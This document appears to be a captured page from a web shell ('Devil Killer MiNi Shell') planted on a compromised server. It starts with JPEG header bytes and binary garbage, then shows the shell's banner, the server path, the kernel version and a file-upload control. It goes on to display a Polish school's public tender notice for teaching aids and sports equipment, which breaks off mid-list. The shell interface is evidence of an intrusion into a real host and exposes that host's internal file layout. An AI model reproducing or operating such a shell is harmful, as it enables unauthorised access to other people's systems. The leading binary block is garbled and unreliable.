JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20251031/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20251031/0050968801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dostawa pomocy dydaktycznych, urządzeń i mebli do zajęć dla projektu „Terapeutyczna Moc Nauki i Zabawy”, </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szkoła Podstawowa im. Jana Pawła II w Brzezinach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001217434</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Szkolna 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Brzeziny</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-026</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zsbrzeziny.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zsbrzeziny.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa pomocy dydaktycznych, urządzeń i mebli do zajęć dla projektu „Terapeutyczna Moc Nauki i Zabawy”, </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-fd251365-2693-48ec-9638-65ee4b7b3c4d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00509688</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00467299/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Dostawa pomocy dydaktycznych, urządzeń i mebli do zajęć dla projektu „Terapeutyczna Moc Nauki i Zabawy”,</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Terapeutyczna Moc Nauki i Zabawy”, dofinansowanego ze środków Europejskiego Funduszu Społecznego Plus (EFS+), w ramach programu regionalnego Fundusze Europejskie dla Świętokrzyskiego 2021-2027, </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-fd251365-2693-48ec-9638-65ee4b7b3c4d <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-fd251365-2693-48ec-9638-65ee4b7b3c4d</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym <br/>a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl. lub poczty elektronicznej sekretariat@zsbrzeziny.pl (nie dotyczy składania ofert)<br/>2.	Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>3.	Zamawiający wyznacza następujące osoby do kontaktu z wykonawcami: Pani Aleksandra Głodek adres e-mail: l sekretariat@zsbrzeziny.pl<br/>4.	Adres strony internetowej prowadzonego postępowania https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-fd251365-2693-48ec-9638-65ee4b7b3c4d<br/>5.	Postępowanie można wyszukać również ze strony głównej Platformy e-Zamówienia (przycisk Przeglądaj postępowania / konkursy&#34;).<br/>6.	Identyfikator (ID) postępowania na Platformie eZamówienia: ocds-148610-fd251365-2693-48ec-9638-65ee4b7b3c4d<br/>7.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca&#34; na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowe https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce Centrum Pomocy&#34;.<br/>8.	Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>9.	Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/> CDN w SWZ w Rozdziale XII. INFORMACJE O ŚRODKACH KOMUNIKACJI ELEKTRONICZNEJ, PRZY UŻYCIU KTÓRYCH<br/> ZAMAWIAJĄCY BĘDZIE KOMUNIKOWAŁ SIĘ Z WYKONAWCAMI, ORAZ INFORMACJE O WYMAGANIACH TECHNICZNYCH I<br/> ORGANIZACYJNYCH SPORZĄDZANIA, WYSYŁANIA I ODBIERANIA KORESPONDENCJI ELEKTRONICZNEJ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Wszelkie informacje znajdują się w SWZ oraz załączniku nr 7 - wzór umowy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SP/1/PZ/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> a)	Część 1 - „Dostawa klocków edukacyjnych do zajęć z programowania”<br/>W tym:<br/>1.	Zestaw klocków edukacyjnych do tworzenia opowieści – 3 zestawy.<br/>2.	Zestaw klocków edukacyjnych –podstawowy – 3 zestawy.<br/>3.	Zestaw klocków edukacyjnych 2 – 3 zestawy.<br/>Szczegółowa specyfikacja zamówienia znajduję się w załączniku nr 1 do SWZ – formularz dodatkowy do oferty. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37520000-9 - Zabawki</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamówienie udzielone będzie wyłącznie Wykonawcy wybranemu zgodnie z przepisami ustawy Prawo zamówień publicznych. Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w Specyfikacji Warunków Zamówienia. Jeżeli Zamawiający nie będzie mógł wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybierze ofertę z najniższą ceną.<br/>2.	Za najkorzystniejszą zostanie uznana oferta (spośród wszystkich złożonych w postępowaniu ofert niepodlegających odrzuceniu), która otrzyma największą łączną liczbę punków <br/>w poszczególnych kryteriach oceny ofert ( C+G+S).<br/><br/>Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami:<br/><br/>a)	Kryterium CENA. Waga kryterium - 60 punktów<br/><br/>Oferta proponująca najniższą cenę otrzyma 60 pkt, pozostałe oferty będą punktowane według poniższego wzoru, z dokładnością do 1/100 punktu:<br/><br/>Cmin<br/>C	= ----------------------------x 60<br/>C bad.<br/>gdzie:<br/><br/>C - ilość punktów oferty badanej w kryterium cena<br/>Cmin - najniższa cena (brutto) spośród wszystkich podlegających ocenie ofert <br/>C bad. - cena (brutto) oferty badanej<br/><br/>b)	Kryterium – TERMIN GWARANCJI. Waga kryterium – 30 punktów (G)<br/><br/>W powyższym kryterium oceniany będzie czas wydłużenia minimalnego okresu wymaganej gwarancji. Oferty będą oceniane wg następujących zasad:<br/><br/>-	minimalny okres udzielonej gwarancji – 24 m-ce<br/>-	maksymalny okres udzielonej gwarancji – 48 m-cy<br/>Okres gwarancji 24 miesięcy - 0 pkt<br/>Okres gwarancji 32 miesięcy	-	10 pkt<br/>Okres gwarancji 40 miesięcy	-	20 pkt<br/>Okres gwarancji 48 miesięcy	-	30 pkt<br/><br/>Kryterium okresu udzielonej gwarancji oznacza doliczenie do punktacji 10 punktów za przedłużenie minimalnego okresu gwarancji o 8 m-cy.<br/>Zaoferowanie gwarancji krótszej niż 24 m-cy będzie skutkowało odrzuceniem oferty na podstawie art. 226 ust. 1 pkt 5 ustawy PZP. W przypadku podania okresu dłuższego, niż ten wynikający <br/>z punktacji będzie skutkowało przyznaniem punktów opartych na okresie wskazanym w zestawieniu. Przykładowo: wskazany w ofercie okres gwarancji 50 miesięcy będzie skutkował przyznaniem 30 pkt.<br/><br/>c)	Kryterium - ASPEKTY SPOŁECZNE. Waga kryterium – 10 punktów (S)<br/><br/>W powyższym kryterium ocenie zostanie poddana deklaracja zaangażowania do realizacji zamówienia co najmniej jednej osoby niepełnosprawnej przez cały okres trwania umowy. Maksymalna liczba punktów w kryterium równa jest określonej wadze kryterium (maksymalnie 10 punktów).<br/>Przyznawanie ilości punktów poszczególnym ofertom odbywać się będzie według następującej zasady:<br/>1.	W przypadku braku zadeklarowania zatrudnienia/oddelegowania do realizacji zamówienia osób niepełnosprawnych – Wykonawca otrzyma – 0 pkt.<br/>2.	W przypadku zadeklarowania zatrudnienia/oddelegowania do realizacji zamówienia osób niepełnosprawnych w ilość min 1 osoby – Wykonawca otrzyma – 10 pkt.<br/><br/>Kryterium będzie weryfikowane na podstawie informacji zawartych w Formularzu oferty. <br/>W przypadku braku możliwości weryfikacji podanych informacji - Zamawiający uzna, iż Wykonawca nie zadeklarował zaangażowania do realizacji zamówienia osób niepełnosprawnych i nie przyzna punktów w przedmiotowym kryterium.<br/>Cdn w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekty społeczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> b)	Część 2 – „Dostawa pomocy dydaktycznych do zajęć sportowych”<br/>w tym:<br/>1.	Bieżnia elektryczna - 2 szt.<br/>2.	Rower Mechaniczny– 1 szt.<br/>3.	Hula -hop masujący z magnesami -6 szt.<br/>4.	Stepper skośny z linkami – 2 szt.<br/>5.	Stepper do aerobiku -10 szt.<br/>6.	Piłka gimnastyczna orzeszek - 6 szt.<br/>7.	Piłka gimnastyczna - 4 szt.<br/>8.	Wałek fitness – 11 szt.<br/>9.	Zestaw gum do ćwiczeń 3 w komplecie - 4 komplety.<br/>10.	Kettlebell regulowany– 5 szt.<br/>11.	Hantle chromowane 2 szt. – 5 kompletów<br/>12.	Hantle chromowane 2 szt.(6kg) – 5 kompletów<br/>13.	Mata do yogi – 11 szt.<br/>14.	Wałek podwójny – 11 szt.<br/>15.	Platforma wibracyjna – 2 szt.<br/>16.	Rower fitness – 1 szt.<br/>17.	Zestaw piłek do masażu 3 szt.- 4 komplety.<br/>18.	Piłka do balansowania – 2 komplety.<br/>19.	Zestaw hantli winylowych ze stojakiem – 2 komplety<br/>Szczegółowa specyfikacja zamówienia znajduję się w załączniku nr 1 do SWZ – formularz dodatkowy do oferty. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37440000-4 - Sprzęt do ćwiczeń fizycznych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37441700-8 - Piłki do ćwiczeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamówienie udzielone będzie wyłącznie Wykonawcy wybranemu zgodnie z przepisami ustawy Prawo zamówień publicznych. Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w Specyfikacji Warunków Zamówienia. Jeżeli Zamawiający nie będzie mógł wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybierze ofertę z najniższą ceną.<br/>2.	Za najkorzystniejszą zostanie uznana oferta (spośród wszystkich złożonych w postępowaniu ofert niepodlegających odrzuceniu), która otrzyma największą łączną liczbę punków <br/>w poszczególnych kryteriach oceny ofert ( C+G+S).<br/><br/>Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami:<br/><br/>a)	Kryterium CENA. Waga kryterium - 60 punktów<br/><br/>Oferta proponująca najniższą cenę otrzyma 60 pkt, pozostałe oferty będą punktowane według poniższego wzoru, z dokładnością do 1/100 punktu:<br/><br/>Cmin<br/>C	= ----------------------------x 60<br/>C bad.<br/>gdzie:<br/><br/>C - ilość punktów oferty badanej w kryterium cena<br/>Cmin - najniższa cena (brutto) spośród wszystkich podlegających ocenie ofert <br/>C bad. - cena (brutto) oferty badanej<br/><br/>b)	Kryterium – TERMIN GWARANCJI. Waga kryterium – 30 punktów (G)<br/><br/>W powyższym kryterium oceniany będzie czas wydłużenia minimalnego okresu wymaganej gwarancji. Oferty będą oceniane wg następujących zasad:<br/><br/>-	minimalny okres udzielonej gwarancji – 24 m-ce<br/>-	maksymalny okres udzielonej gwarancji – 48 m-cy<br/>Okres gwarancji 24 miesięcy - 0 pkt<br/>Okres gwarancji 32 miesięcy	-	10 pkt<br/>Okres gwarancji 40 miesięcy	-	20 pkt<br/>Okres gwarancji 48 miesięcy	-	30 pkt<br/><br/>Kryterium okresu udzielonej gwarancji oznacza doliczenie do punktacji 10 punktów za przedłużenie minimalnego okresu gwarancji o 8 m-cy.<br/>Zaoferowanie gwarancji krótszej niż 24 m-cy będzie skutkowało odrzuceniem oferty na podstawie art. 226 ust. 1 pkt 5 ustawy PZP. W przypadku podania okresu dłuższego, niż ten wynikający <br/>z punktacji będzie skutkowało przyznaniem punktów opartych na okresie wskazanym w zestawieniu. Przykładowo: wskazany w ofercie okres gwarancji i rękojmi 50 miesięcy będzie skutkował przyznaniem 30 pkt.<br/><br/>c)	Kryterium - ASPEKTY SPOŁECZNY. Waga kryterium – 10 punktów (S)<br/><br/>W powyższym kryterium ocenie zostanie poddana deklaracja zaangażowania do realizacji zamówienia co najmniej jednej osoby niepełnosprawnej przez cały okres trwania umowy. Maksymalna liczba punktów w kryterium równa jest określonej wadze kryterium (maksymalnie 10 punktów).<br/>Przyznawanie ilości punktów poszczególnym ofertom odbywać się będzie według następującej zasady:<br/>1.	W przypadku braku zadeklarowania zatrudnienia/oddelegowania do realizacji zamówienia osób niepełnosprawnych – Wykonawca otrzyma – 0 pkt.<br/>2.	W przypadku zadeklarowania zatrudnienia/oddelegowania do realizacji zamówienia osób niepełnosprawnych w ilość min 1 osoby – Wykonawca otrzyma – 10 pkt.<br/><br/>Kryterium będzie weryfikowane na podstawie informacji zawartych w Formularzu oferty. <br/>W przypadku braku możliwości weryfikacji podanych informacji - Zamawiający uzna, iż Wykonawca nie zadeklarował zaangażowania do realizacji zamówienia osób niepełnosprawnych i nie przyzna punktów w przedmiotowym kryterium.<br/>Cdn w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekty społeczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> c)	Część 3 - Dostawa pomocy materiałów i sprzętu dydaktycznego do zajęć ekologicznych i wyrównawczych.<br/>W tym:<br/>1.	Zestaw do robienia świec- 10 szt.<br/>2.	Zestaw: Długopis drukarka 3D + 115 m filamentu -10 szt.<br/>3.	Zestaw do robienia Slime – 5 kompletów.<br/>4.	Mega zestaw do robienia dużych baniek mydlanych – 2 komplety.<br/>5.	Taca - talerz podstawka na żywność – 16 szt.<br/>6. Taca kuchenna tacka do serwowania , taca na żywność 30X20 cm czarna<br/> - 15 szt.<br/>7.	Wosk sojowy 1 kg – 1 szt.<br/>8.	Baza mydlana -2kg - 2 szt<br/>9.	Agar 500g – 4 szt.<br/>10.	Zestaw barwników do zabaw kreatywnych 3x200 ml. - 3 zestawy.<br/>11.	Aktywator do slime 1L – 3 szt.<br/>12.	Płyn do dużych baniek mydlanych 5 L– 2 szt.<br/>13.	Klej PVA biały do papieru Slime Xl 5 L - 2 szt.<br/>14.	Knoty do świec 100 szt. – 2 komplety.<br/>15.	Zestaw na warsztaty mydlane dla 20 osób-– 2 komplety.<br/>16.	Zestaw do robienia musujących kul kąpielowych – 10 kompletów.<br/>17. Fartuch laboratoryjny damski na zatrzaski- 9 szt.<br/>18.	